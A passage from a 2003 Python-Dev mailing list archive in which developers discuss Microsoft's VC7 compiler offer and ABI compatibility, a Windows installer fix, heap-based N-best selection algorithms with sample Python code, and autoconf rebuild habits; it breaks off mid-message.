 <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>
 <3EB853C8.70100@ghaering.de>
Message-ID: <16056.22717.877383.95261@montanaro.dyndns.org>

    Gerhard> OTOH I'm pretty sure that a mingw build would be much easier if
    Gerhard> I just wrote my own Makefiles, but that's probably unlikely to
    Gerhard> ever be merged.  At least that was my experience when making
    Gerhard> PostgreSQL's client code compile with mingw.

I suggest you go ahead with whatever is easiest for you.  At least you will
be able to focus on actually solving the MinGW-related problems.  Others can
chip in on the autoconf problems.  As a starter perhaps a Makefile.mingw
file can be added to the PCBuild directory.  At a later date the interim
makefile can be removed to the attic.

Skip




From tim.one@comcast.net  Wed May  7 02:17:49 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 21:17:49 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305070057.10872.phil@riverbankcomputing.co.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCCECCEFAB.tim.one@comcast.net>

[Phil Thompson]
> ...
> If it's free, why pay any attention to the offer of a donation of a GUI
> frontend? (With a certain amount of irony, I don't attach any
> value to a GUI frontend to a compiler.)

The GUI isn't just the compiler, it's also the automated dependency
analysis, a make system, and a (very good) debugger.

> If it is free using some Microsoft definition of the word (eg.
> users have to upgrade to Win2K, or some other "read the small print"
> reason) then my vote is -1.

Guido asked who would want one.  You don't, but you don't get to vote that
nobody else does either.



From BPettersen@NAREX.com  Wed May  7 02:21:11 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Tue, 6 May 2003 19:21:11 -0600
Subject: [Python-Dev] Windows installer request...
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE2A8@admin56.narex.com>

> From: Tim Peters [mailto:tim.one@comcast.net]
>
> [Bjorn Pettersen]
[...]
> >  item: Get Environment Variable
> >    Variable=OSDRIVE
> >    Environment=SystemDrive
> >    Default=C:
> >  end
[...]

> Enough already <wink/frown>:  I don't have time to try
> umpteen different things here, or really even one.

Thank you for doing it anyway then <smile>.

> What I did do is build an installer *just* removing the hard-coded
> Wizard-generated "C:" prefix.  Martin tried that and said it
> worked for him. It doesn't hurt me.  If it works for you too,
> I'll commit the change:

Works like a charm. Tested on Win98, Win2k, WinXP Pro (regular), and my
"special" XP. (NT4 seems to have died a silent death, so I couldn't test
it there...)

> Please give that a try.  It's an incoherent mix of files, so
> please use a junk name for the installation directory and program
> startup group (or simply abort the install after you see whether
> it suggested a drive you approve of).

I went all the way through (all files seem to have gone in correctly),
and as expected it shadowed my original install of 2.3b1 in the
Add/Remove Programs window. Surprisingly however, the original came back
after this one was removed. Who'd have thought.. ;-)

[.. xx.wse needs the Wise GUI to create an installer..]

Thought it might be that way... FWIW, re: the MSVC7 debate, the
"Microsoft Development Environment" (DevStudio), comes with five
different "Setup and Deployment projects". I've never used any of them,
nor Wise (obviously :-), but it could potentially get you out of the
loop... <wink>.

Thanks again!

-- bjorn


From tim.one@comcast.net  Wed May  7 02:23:55 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 21:23:55 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB83C44.20706@v.loewis.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCEECDEFAB.tim.one@comcast.net>

[Tim]
> Speaking of which, presumably Tcl/Tk and SSL and etc on Windows
> should also be compiled under VC7 then.

[Martin v. Löwis]
> That is certainly the case (not to forget bsddb, zlib, and bzip2).
> This will require quite some volunteer time.

Amplifying a little, the Python code base required some changes before it
would compile under VC 7 (I didn't make these changes, and don't recall any
details apart from changes in MS's LONG_INTEGER APIs).  There's no reason to
believe that other code bases are immune from needing changes too.  At
present, we don't maintain any patches to any external code base in order to
build the Windows release.  If we needed to make changes to them for VC 7,
that would probably change, and should really be done by the packages'
primary (non-Python) maintainers.




From tim.one@comcast.net  Wed May  7 02:40:49 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 21:40:49 -0400
Subject: [Python-Dev] Windows installer request...
In-Reply-To: <60FB8BB7F0EFC7409B75EEEC13E20192022DE2A8@admin56.narex.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCECFEFAB.tim.one@comcast.net>

[Tim]
>> Enough already <wink/frown>:  I don't have time to try
>> umpteen different things here, or really even one.

[Bjorn Pettersen]
> Thank you for doing it anyway then <smile>.

You're welcome!  I took the "C:" out on Monday, when I had just enough spare
time to delete one byte, and took the rest out of sleep.

> ...
> Works like a charm. Tested on Win98, Win2k, WinXP Pro (regular), and my
> "special" XP. (NT4 seems to have died a silent death, so I couldn't test
> it there...)

Thanks!  I'll check it in ... Thursday.

>> Please give that a try.  It's an incoherent mix of files, so
>> please use a junk name for the installation directory and program
>> startup group (or simply abort the install after you see whether
>> it suggested a drive you approve of).

> I went all the way through (all files seem to have gone in correctly),
> and as expected it shadowed my original install of 2.3b1 in the
> Add/Remove Programs window. Surprisingly however, the original came back
> after this one was removed. Who'd have thought.. ;-)

The rollback features in Wise 8.14-generated installers are pretty good
(esp. if you check the "make backups" option when installing).
Uninstall/rollback will even restore start menu groups and file
associations.  I don't trust it enough to recommend it, though (I haven't
really beat on it).

Something fun to waste time on:  in the very last "Installation Completed!"
install dialog, click "Cancel" instead of "Finish".  It will then roll back
all the changes it made, leaving things as they were before you started the
installer.

> ... FWIW, re: the MSVC7 debate, the "Microsoft Development Environment"
> (DevStudio), comes with five different "Setup and Deployment projects".
> I've never used any of them, nor Wise (obviously :-), but it could
> potentially get you out of the loop... <wink>.

Thanks, but I'm not sure even death has that kind of power.



From dave@boost-consulting.com  Wed May  7 03:16:25 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Tue, 06 May 2003 22:16:25 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
References: <008601c31414$a26d0120$21795418@dell1700> <3EB82CF8.4030005@v.loewis.de>
Message-ID: <usmrry006.fsf@boost-consulting.com>

"Martin v. Löwis" <martin@v.loewis.de> writes:

> Brian Quinlan wrote:
>
>> Wouldn't this only affect extension modules using PyFile_FromFile and
>> PyFile_AsFile?
>
> That might be the case. However, notice that there might be other
> incompatibilities which we might discover by chance only - Microsoft
> hasn't documented any of this.

They pretty much told you the exact score, through me.  More details
are available if necessary.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From dave@boost-consulting.com  Wed May  7 03:20:59 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Tue, 06 May 2003 22:20:59 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
References: <16056.2317.124886.963460@montanaro.dyndns.org> <007e01c31405$1ea52fc0$21795418@dell1700>
Message-ID: <un0hzxzsk.fsf@boost-consulting.com>

Brian Quinlan <brian@sweetapp.com> writes:

>> I can see the downside (next to no experience with 7.x, and perhaps
> none
>> before the final release).  What's the upside?
>
> It's free and more standards compliant. 

That compliance means a lot to C++ programmers.  It takes MSVC from
being a real PITA to do any serious C++ in (Vc7.0 was worse than 6 in
some ways) to being a first-class contender among quality C++
implementations.

I'm not sure whether that should have any effect on decisions made
about Python development, though ;-)

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From tim.one@comcast.net  Wed May  7 03:42:29 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 22:42:29 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <eppstein-4216E0.23002405052003@main.gmane.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECIEFAB.tim.one@comcast.net>

[David Eppstein]
>>> For fairness, it might be interesting to try another run of your test
>>> in which the input sequence is sorted in increasing order rather
>>> than random.

[Tim]
>> Comparing the worst case of one against the best case of the
>> other isn't my idea of fairness <wink>, but sure.

[David]
> Well, it doesn't seem any fairer to use random data to compare an
> algorithm with an average time bound that depends on an assumption of
> randomness in the data...anyway, the point was more to understand the
> limiting cases.  If one algorithm is usually 3x faster than the other,
> and is never more than 10x slower, that's better than being usually 3x
> faster but sometimes 1000x slower, for instance.

Sure.  In practice you need to know time distributions when using an
algorithm -- best, expected, worse, and how likely each are under a variety
of expected conditions.

> My Java KBest code was written to make data subsets for a half-dozen web
> pages (same data selected according to different criteria).  Of these
> six instances, one is presented the data in roughly ascending order, one
> in descending order, and the other four are less clear but probably not
> random.
>
> Robustness in the face of this sort of variation is why I prefer any
> average-case assumptions in my code's performance to depend only on
> randomness from a random number generator, and not arbitrariness in the
> actual input.  But I'm not sure I'd usually be willing to pay a 3x
> penalty for that robustness.

Most people aren't, until they hit a bad case <0.5 wink>.  So "pure"
algorithms rarely survive in the face of a large variety of large problem
instances.  The monumental complications Python's list.sort() endures to
work well under many conditions (both friendly and hostile) are a good
example of that.  In industrial real life, I expect an all-purpose N-Best
queue would need to take a hybrid approach, monitoring its fast-path gimmick
in some cheap way in order to fall back to a more defensive algorithm when
the fast-path gimmick isn't paying.

>> Here's a surprise:  I coded a variant of the quicksort-like
>> partitioning method, at the bottom of this mail.  On the largest-1000
>> of a million random-float case, times were remarkably steady across
>> trials (i.e., using a different set of a million random floats each
>> time):
>>
>> heapq                    0.96 seconds
>> sort (micro-optimized)   3.4  seconds
>> KBest (below)            2.6  seconds

> Huh.  You're almost convincing me that asymptotic analysis works even in
> the presence of Python's compiled-vs-interpreted anomalies.

Indeed, you can't fight the math!  It often takes a large problem for better
O() behavior to overcome a smaller constant in a worse O() approach, and
especially in Python.  For example, I once wrote and tuned and timed an O(N)
worst-case rank algorithm in Python ("find the k'th smallest item in a
sequence"), using the median-of-medians-of-5 business.  I didn't have enough
RAM at the time to create a list big enough for it to beat "seq.sort();
return seq[k]".  By playing lots of tricks, and boosting it to
median-of-medians-of-11, IIRC I eventually got it to run faster than sorting
on lists with "just" a few hundred thousand elements.
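
(For illustration, here is a minimal sketch of a selection routine in that
spirit.  It is plain expected-O(N) quickselect, *not* the worst-case-linear
median-of-medians variant described above, and the function name is made up.)

import random

def kth_smallest(seq, k):
    # Return the k'th smallest item of seq (0-based, 0 <= k < len(seq)).
    # Expected O(N): each pass partitions around a random pivot and
    # recurses into only one side, instead of fully sorting.
    items = list(seq)
    while True:
        pivot = random.choice(items)
        less = [x for x in items if x < pivot]
        equal = [x for x in items if x == pivot]
        if k < len(less):
            items = less
        elif k < len(less) + len(equal):
            return pivot
        else:
            k -= len(less) + len(equal)
            items = [x for x in items if x > pivot]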

But in *this* case I'm not sure that the only thing we're really measuring
isn't:

1. Whether an algorithm has an early-out gimmick.
2. How effective that early-out gimmick is.
and
3. How expensive it is to *try* the early-out gimmick.

The heapq method Rulz on random data because its answers then are "yes,
very, dirt cheap".  I wrote the KBest test like so:

def three(seq, N):
    NBest = KBest(N, -1e200)
    for x in seq:
        NBest.put(x)
    L = NBest.get()
    L.sort()
    return L

(the sort at the end is just so the results can be compared against the
other methods, to ensure they all get the same answer).  If I break into the
abstraction and change the test like so:

def three(seq, N):
    NBest = KBest(N, -1e200)
    cutoff = -1e200
    for x in seq:
        if x > cutoff:
            NBest.put(x)
            cutoff = NBest.cutoff
    L = NBest.get()
    L.sort()
    return L

then KBest is about 20% *faster* than heapq on random data.  Doing the
comparison inline avoids a method call when early-out pays, early-out pays
more and more as the sequence nears its end, and simply avoiding the method
call then makes the overall algorithm 3X faster.  So O() analysis may
triumph when equivalent low-level speed tricks are played (the heapq method
did its early-out test inline too), but get swamped before doing so.
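
(For comparison, a minimal sketch of the heapq-based N-best approach referred
to above, with the early-out test done inline; this is an illustration only,
not the actual benchmark code, and the function name is made up.)

import heapq

def nbest_heapq(seq, N):
    # Keep the N largest items seen so far in a bounded min-heap.
    # heap[0] is the smallest of the current N best, so the inline
    # "x > heap[0]" comparison is the cheap early-out test.
    heap = []
    for x in seq:
        if len(heap) < N:
            heapq.heappush(heap, x)
        elif x > heap[0]:
            heapq.heapreplace(heap, x)
    heap.sort()     # ascending, so results compare against the other methods
    return heap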

> The other surprise is that (unlike, say, the sort or heapq versions)
> your KBest doesn't look significantly more concise than my earlier Java
> implementation.

The only thing I was trying to minimize was my time in whipping up something
correct to measure.  Still, I count 107 non-blank, non-comment lines of
Java, and 59 of Python.  Java gets unduly penalized for curly braces, Python
for tedious tricks like

        buf = self.buf
        k = self.k

to make locals for speed, and that I never put dependent code on the same
line as an "if" or "while" test (while you do).  Note that it's not quite
the same algorithm:  the Python version isn't restricted to ints, and in
particular doesn't assume it can do arithmetic on a key to get "the next
larger" key.  Instead it does 3-way partitioning to find the items equal to
the pivot.  The greater generality may make the Python a little windier.

BTW, the heapq code isn't really more compact than C, if you count the
implementation code in heapq.py too:  it's all low-level small-int
arithmetic and array indexing.  The only real advantage Python has over
assembler for code like that is that we can grow the list/heap dynamically
without any coding effort.



From martin@v.loewis.de  Wed May  7 06:21:46 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 07 May 2003 07:21:46 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEECDEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEECDEFAB.tim.one@comcast.net>
Message-ID: <m3el3bwcut.fsf@mira.informatik.hu-berlin.de>

Tim Peters <tim.one@comcast.net> writes:

> There's no reason to believe that other code bases are immune from
> needing changes too.

OTOH, there is every reason to believe that for many of these packages,
the required changes have been made already, at least for those that
get regular updates (Tcl/Tk, bsddb).

Regards,
Martin


From martin@v.loewis.de  Wed May  7 06:23:31 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 07 May 2003 07:23:31 +0200
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <usmrry006.fsf@boost-consulting.com>
References: <008601c31414$a26d0120$21795418@dell1700>
 <3EB82CF8.4030005@v.loewis.de> <usmrry006.fsf@boost-consulting.com>
Message-ID: <m3addzwcrw.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> They pretty much told you the exact score, through me.  More details
> are available if necessary.

That is information about the core ABI. I do need to be concerned
about changes in the libraries, as well, in particular about
incompatibilities resulting from multiple copies of the C library. You
said you don't know much about that.

Regards,
Martin



From paoloinvernizzi@dmsware.com  Wed May  7 08:12:34 2003
From: paoloinvernizzi@dmsware.com (Paolo Invernizzi)
Date: Wed, 07 May 2003 09:12:34 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <03dc01c31424$26758500$530f8490@eden>
References: <03dc01c31424$26758500$530f8490@eden>
Message-ID: <3EB8B1E2.2050108@dmsware.com>

Mark Hammond wrote:

>Another thing to consider is the "make" environment.  If we don't use
>DevStudio, then presumably our existing project files will become useless.
>Not a huge problem, but a real one.  MSVC exported makefiles are not
>designed to be maintained.  I'm having good success with autoconf and Python
>on other projects, but that would raise the barrier to including cygwin in
>your build environment.
>
I think scons (www.scons.org) will have, in its next release, full 
support for building targets using VC6 *project* files, and full support 
for VC7.  It actually also has support for cygwin and mingw...

So I think it is possible to have an automated way of building a VC7 Python 
based only on some scons scripts and the VC6 project files...
The possible goal is to keep working with the VC6 IDE as now, and have a 
simple build script able to automatically build the VC7 version, tracking 
changes.

I've inserted Greg Spencer, who I know is working on this... surely he 
can bring us more details.


---
Paolo Invernizzi.






From phil@riverbankcomputing.co.uk  Wed May  7 09:02:46 2003
From: phil@riverbankcomputing.co.uk (Phil Thompson)
Date: Wed, 7 May 2003 09:02:46 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCECCEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCECCEFAB.tim.one@comcast.net>
Message-ID: <200305070902.46353.phil@riverbankcomputing.co.uk>

On Wednesday 07 May 2003 2:17 am, Tim Peters wrote:
> [Phil Thompson]
>
> > ...
> > If it's free, why pay any attention to the offer of a donation of a GUI
> > frontend? (With a certain amount of irony, I don't attach any
> > value to a GUI frontend to a compiler.)
>
> The GUI isn't just the compiler, it's also the automated dependency
> analysis, a make system, and a (very good) debugger.
>
> > If it is free using some Microsoft definition of the word (eg.
> > users have to upgrade to Win2K, or some other "read the small print"
> > reason) then my vote is -1.
>
> Guido asked who would want one.  You don't, but you don't get to vote that
> nobody else does either.

That's not the point I'm trying to make. If there is a cost to *users* of a 
change then that change must be managed properly. The statement on 
Microsoft's web page says...

"Non-developers need to install the .NET Framework 1.1 to run applications 
developed using the .NET Framework 1.1."

The impression I'm getting is that a quick switchover to VC 7 is being 
suggested - that's what I'm "voting" against.

Phil


From harri.pasanen@trema.com  Wed May  7 09:31:08 2003
From: harri.pasanen@trema.com (Harri Pasanen)
Date: Wed, 7 May 2003 10:31:08 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB81A8B.9090603@v.loewis.de>
References: <007f01c31409$3a5f9670$21795418@dell1700> <200305062212.07539.aleax@aleax.it> <3EB81A8B.9090603@v.loewis.de>
Message-ID: <200305071031.08474.harri.pasanen@trema.com>

On Tuesday 06 May 2003 22:26, Martin v. Löwis wrote:
> Alex Martelli wrote:
> > When we discussed VC versions (back when we met in Oxford during
> > PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
> > are indeed compatible
>
> I doubt he said this in this generality: he surely knows that you
> cannot mix C++ objects files on the object file level between those
> compilers, as they implement completely different ABIs.
>
> For Python, the biggest problem is that you cannot pass FILE* from
> one C library to the other, because of some stupid locking test in
> the C library. This does cause crashes when you try to use Python
> extension modules compiled with the wrong compiler.
>

One known failure case from the real world is the OmniORB free CORBA
ORB.  The omniidl parser, which is implemented as a mixture of python
and C++, requires that python is compiled with the same VC version as
you are compiling OmniORB with.

So if you are using VC7 to compile OmniORB, you cannot use the binary
Python 2.2.2 from pythonlabs for it, you need to compile your own
python using VC7.  I believe it is the FILE * that is causing the
problem here.  If I recall correctly, the size of the underlying FILE
struct is different in msvcrt.dll and msvcrt7.dll.  I don't know the
gory details, I just know the cure.  This issue was also discussed on
the omniORB mailing list.

For our own product we have to support both VC6 and VC7.  For our
development version we have actually imported python 2.3 into our CVS,
and we are compiling it with VC7.1.  Our previous release continues
to rely on VC6, and Python 2.2.2, so each developer actually has
both VC6 and VC7.1 installed on their machine, and correspondingly
both python 2.2.2 and python 2.3.

Just another datapoint.

-Harri


From sjoerd@acm.org  Wed May  7 09:36:46 2003
From: sjoerd@acm.org (Sjoerd Mullender)
Date: Wed, 07 May 2003 10:36:46 +0200
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status --recheck"
In-Reply-To: <16056.2688.72423.251200@montanaro.dyndns.org>
References: <16055.57554.364845.689049@montanaro.dyndns.org> <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
 <16056.2688.72423.251200@montanaro.dyndns.org>
Message-ID: <20030507083646.6305F74230@indus.ins.cwi.nl>

On Tue, May 6 2003 Skip Montanaro wrote:

> 
>     >> This generated pyconfig.h.  It would thus appear that config.status
>     >> shouldn't be used by developers.  Apparently one of the other flags
>     >> it appends to the generated configure command suppresses generation
>     >> of pyconfig.h (and maybe other files).
> 
>     Martin> Can you find out whether this is related to the fact that you
>     Martin> are building in a separate build directory?
> 
> I just confirmed that it's not related to the separate build directory.
> When you run config.status --recheck it reruns your latest configure command
> with the extra flags --no-create and --no-recursion.  Without rummaging
> around in the configure file my guess is the --no-create flag is the
> culprit.  
> 
> So, a word to the wise: avoid config.status --recheck.

I don't agree.  Just run ./config.status without arguments after running
./config.status --recheck.  That *will* regenerate all files.

-- Sjoerd Mullender <sjoerd@acm.org>


From Paul.Moore@atosorigin.com  Wed May  7 11:49:36 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Wed, 7 May 2003 11:49:36 +0100
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <16E1010E4581B049ABC51D4975CEDB88619A64@UKDCX001.uk.int.atosorigin.com>

From: Guido van Rossum [mailto:guido@python.org]
> > If this means that those of us with VC6, and with no plans/reasons to
> > upgrade can no longer build our own extensions, this would be a
> > disaster.

> Part of the offer was:

> | Potentially we can even figure out how to enable anyone to
> | build Python using the freely downloadable compilers I mentioned
> | above...

Which is good news (don't get me wrong, I'm glad to see Microsoft
supporting open source projects in this way). But wouldn't that imply
unoptimised builds?

I just checked:

>cl /O2
Microsoft (R) 32-bit C/C++ Standard Compiler Version 13.00.9466 for 80x86
Copyright (C) Microsoft Corporation 1984-2001. All rights reserved.

cl : Command line warning D4029 : optimization is not available in the
standard edition compiler

So, specifically, if PythonLabs releases Python 2.3 built with MSVC7,
and I want to build the latest version of PIL, (maybe because Fredrik
hasn't released a binary version yet), do I have no way of getting
an optimised build (I pick PIL deliberately, because I guess that image
processing would benefit from optimisation, and in the past, PIL binaries
have been relatively hard to obtain at times)?

That's the problem I see, personally. I have VC6 because my employer uses
Visual Studio for Visual Basic development. But VB has changed so much in
the transition to .NET that I don't believe they will ever go to VS7.
So I will have to remain with VS6 (I'm never going to buy VS7 myself, just
for this sort of job).

Paul.


From mhammond@skippinet.com.au  Wed May  7 11:52:21 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 07 May 2003 20:52:21 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305070902.46353.phil@riverbankcomputing.co.uk>
Message-ID: <046701c31486$bdac6170$530f8490@eden>

> "Non-developers need to install the .NET Framework 1.1 to run
> applications developed using the .NET Framework 1.1."

MSVC7 is not the .NET framework.  Let's just relax a little and have some
faith in the people making these decisions.

Mark.



From mhammond@skippinet.com.au  Wed May  7 11:55:48 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 7 May 2003 20:55:48 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <16E1010E4581B049ABC51D4975CEDB88619A64@UKDCX001.uk.int.atosorigin.com>
Message-ID: <046a01c31487$399d3390$530f8490@eden>

> That's the problem I see, personally. I have VC6 because my 
> employer uses Visual Studio for Visual Basic development. 
> But VB has changed so much in
> the transition to .NET, that I don't believe they will ever 
> going to VS7.  So I will have to remain with VS6 (I'm never 
> going to buy VS7 myself, just for this sort of job).

I must say that anecdotally, I find this to be true.  Developers are *not*
flocking to VC7.  I wonder if that fact has anything to do with MS offering
free compilers?

Maybe we could get 100 free versions out of them <wink>

Mark.





From dave@boost-consulting.com  Wed May  7 12:06:22 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 07 May 2003 07:06:22 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <m3addzwcrw.fsf@mira.informatik.hu-berlin.de> (Martin v.
 Löwis's message of "07 May 2003 07:23:31 +0200")
References: <008601c31414$a26d0120$21795418@dell1700>
 <3EB82CF8.4030005@v.loewis.de> <usmrry006.fsf@boost-consulting.com>
 <m3addzwcrw.fsf@mira.informatik.hu-berlin.de>
Message-ID: <ud6ivxbgx.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. Löwis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> They pretty much told you the exact score, through me.  More details
>> are available if necessary.
>
> That is information about the core ABI. I do need to be concerned
> about changes in the libraries, as well, in particular about
> incompatibilities resulting from multiple copies of the C library. You
> said you don't know much about that.

I can find out almost as easily, if you have specific questions.

Just let me know,
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From mwh@python.net  Wed May  7 12:31:58 2003
From: mwh@python.net (Michael Hudson)
Date: Wed, 07 May 2003 12:31:58 +0100
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status
 --recheck"
In-Reply-To: <16056.2688.72423.251200@montanaro.dyndns.org> (Skip
 Montanaro's message of "Tue, 6 May 2003 14:18:24 -0500")
References: <16055.57554.364845.689049@montanaro.dyndns.org>
 <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
 <16056.2688.72423.251200@montanaro.dyndns.org>
Message-ID: <2m65on6lht.fsf@starship.python.net>

Skip Montanaro <skip@pobox.com> writes:

> So, a word to the wise: avoid config.status --recheck.

I don't know if I'm wise or not but I do tend to go for

 rm -rf build && mkdir build && cd build && ../configure -q && make -s

for most rebuilds... I guess I should trust my tools a bit more.

Cheers,
M.

-- 
  The meaning of "brunch" is as yet undefined.
                                             -- Simon Booth, ucam.chat


From skip@pobox.com  Wed May  7 12:42:21 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 06:42:21 -0500
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status
 --recheck"
In-Reply-To: <2m65on6lht.fsf@starship.python.net>
References: <16055.57554.364845.689049@montanaro.dyndns.org>
 <m3znm06kl2.fsf@mira.informatik.hu-berlin.de>
 <16056.2688.72423.251200@montanaro.dyndns.org>
 <2m65on6lht.fsf@starship.python.net>
Message-ID: <16056.61725.602991.181703@montanaro.dyndns.org>

    >> So, a word to the wise: avoid config.status --recheck.

    Michael> I don't know if I'm wise or not but I do tend to go for

    Michael>  rm -rf build && mkdir build && cd build && ../configure -q && make -s

    Michael> for most rebuilds... I guess I should trust my tools a bit
    Michael> more.

I got in the habit of using config.status --recheck because it allowed me to
only remember a single configure-like command for most packages I
build/install using configure.  I only had to figure out what flags to pass
to configure once, then later typing "C-r rech" in bash was sufficient to
reconfigure the package.  It would be nice if config.status had a flag which
actually executed configure without the --no-create and --no-recursion
flags.

Someone mentioned invoking config.status without the --recheck flag.  I
don't think that's wise in a development environment since that doesn't
actually run configure.  Since we're talking about building Python in a
development environment, I find it hard to believe you'd want to skip
configure altogether.

Skip



From Jack.Jansen@cwi.nl  Wed May  7 14:08:44 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Wed, 7 May 2003 15:08:44 +0200
Subject: [Python-Dev] bsddb185 module changes checked in
In-Reply-To: <16056.8215.274307.904009@montanaro.dyndns.org>
Message-ID: <085D82A5-808D-11D7-A6E2-0030655234CE@cwi.nl>

On Tuesday, May 6, 2003, at 22:50 Europe/Amsterdam, Skip Montanaro 
wrote:

>
> The various bits necessary to implement the "build bsddb185 when
> appropriate" have been checked in.  I'm pretty sure I don't have the best
> possible test for the existence of a db library, but it will have to do for
> now.  I suspect others can clean it up later during the beta cycle.  The
> current detection code in setup.py should work for Nick on OSF/1 and for
> platforms which don't require a separate db library.
>
> I'd appreciate some extra pounding on this code.

On SGI Irix 6.5 (MIPSpro Compilers: Version 7.2.1) it tries to build it,
and fails. It complains about "u_int" and such not being defined.  There's
magic at the top of /usr/include/db.h for defining various types optionally,
and that's as far as my understanding went.
--
Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
If I can't dance I don't want to be part of your revolution -- Emma 
Goldman



From andymac@bullseye.apana.org.au  Wed May  7 10:18:41 2003
From: andymac@bullseye.apana.org.au (Andrew MacIntyre)
Date: Wed, 7 May 2003 20:18:41 +1100 (edt)
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB853C8.70100@ghaering.de>
Message-ID: <Pine.OS2.4.44.0305072012010.198-100000@tenring.andymac.org>

On Wed, 7 May 2003, Gerhard Häring wrote:

> OTOH I'm pretty sure that a mingw build would be much easier if I just
> wrote my own Makefiles, but that's probably unlikely to ever be merged.

I'm maintaining the EMX port in a subdirectory of the PC directory (in
CVS), and it is (basically) the way the MSVC build is being maintained -
if you consider Visual Studio project files as abstract makefiles.

--
Andrew I MacIntyre                     "These thoughts are mine alone..."
E-mail: andymac@bullseye.apana.org.au  | Snail: PO Box 370
        andymac@pcug.org.au            |        Belconnen  ACT  2616
Web:    http://www.andymac.org/        |        Australia



From duncan@rcp.co.uk  Wed May  7 14:30:14 2003
From: duncan@rcp.co.uk (Duncan Booth)
Date: Wed, 7 May 2003 14:30:14 +0100
Subject: [Python-Dev] Microsoft speedup
Message-ID: <Xns9374933CC2E5Cduncanrcpcouk@127.0.0.1>

I was just playing around with the compiler options using Microsoft VC6 and 
I see that adding the option /Ob2 speeds up pystone by about 2.5%
(/Ob2 is the option to automatically inline functions where the compiler 
thinks it is worthwhile.)

The downside is that it increases the size of python23.dll by about 13%.

It's not a phenomenal speedup, but it should be pretty low impact if the 
extra size is considered a worthwhile tradeoff. I haven't checked yet with 
VC7, but the compiler options are the same so the effect should also be 
similar.

-- 
Duncan Booth                                             duncan@rcp.co.uk
int month(char *p){return(124864/((p[0]+p[1]-p[2]&0x1f)+1)%12)["\5\x8\3"
"\6\7\xb\1\x9\xa\2\0\4"];} // Who said my code was obscure?


From sjoerd@acm.org  Wed May  7 15:14:19 2003
From: sjoerd@acm.org (Sjoerd Mullender)
Date: Wed, 07 May 2003 16:14:19 +0200
Subject: [Python-Dev] pyconfig.h not regenerated by "config.status --recheck"
In-Reply-To: <16056.61725.602991.181703@montanaro.dyndns.org>
References: <16055.57554.364845.689049@montanaro.dyndns.org> <m3znm06kl2.fsf@mira.informatik.hu-berlin.de> <16056.2688.72423.251200@montanaro.dyndns.org> <2m65on6lht.fsf@starship.python.net>
 <16056.61725.602991.181703@montanaro.dyndns.org>
Message-ID: <20030507141419.B87AA74230@indus.ins.cwi.nl>

On Wed, May 7 2003 Skip Montanaro wrote:

> 
>     >> So, a word to the wise: avoid config.status --recheck.
> 
>     Michael> I don't know if I'm wise or not but I do tend to go for
> 
>     Michael>  rm -rf build && mkdir build && cd build && ../configure -q && make -s
> 
>     Michael> for most rebuilds... I guess I should trust my tools a bit
>     Michael> more.
> 
> I got in the habit of using config.status --recheck because it allowed me to
> only remember a single configure-like command for most packages I
> build/install using configure.  I only had to figure out what flags to pass
> to configure once, then later typing "C-r rech" in bash was sufficient to
> reconfigure the package.  It would be nice if config.status had a flag which
> actually executed configure without the --no-create and --no-recursion
> flags.
> 
> Someone mentioned invoking config.status without the --recheck flag.  I
> don't think that's wise in a development environment since that doesn't
> actually run configure.  Since we're talking about building Python in a
> development environment, I find it hard to believe you'd want to skip
> configure altogether.

I mentioned that.  But I also said to do that after running with the
--recheck flag.

In fact, I use the bit

Makefile: Makefile.in config.h.in config.status
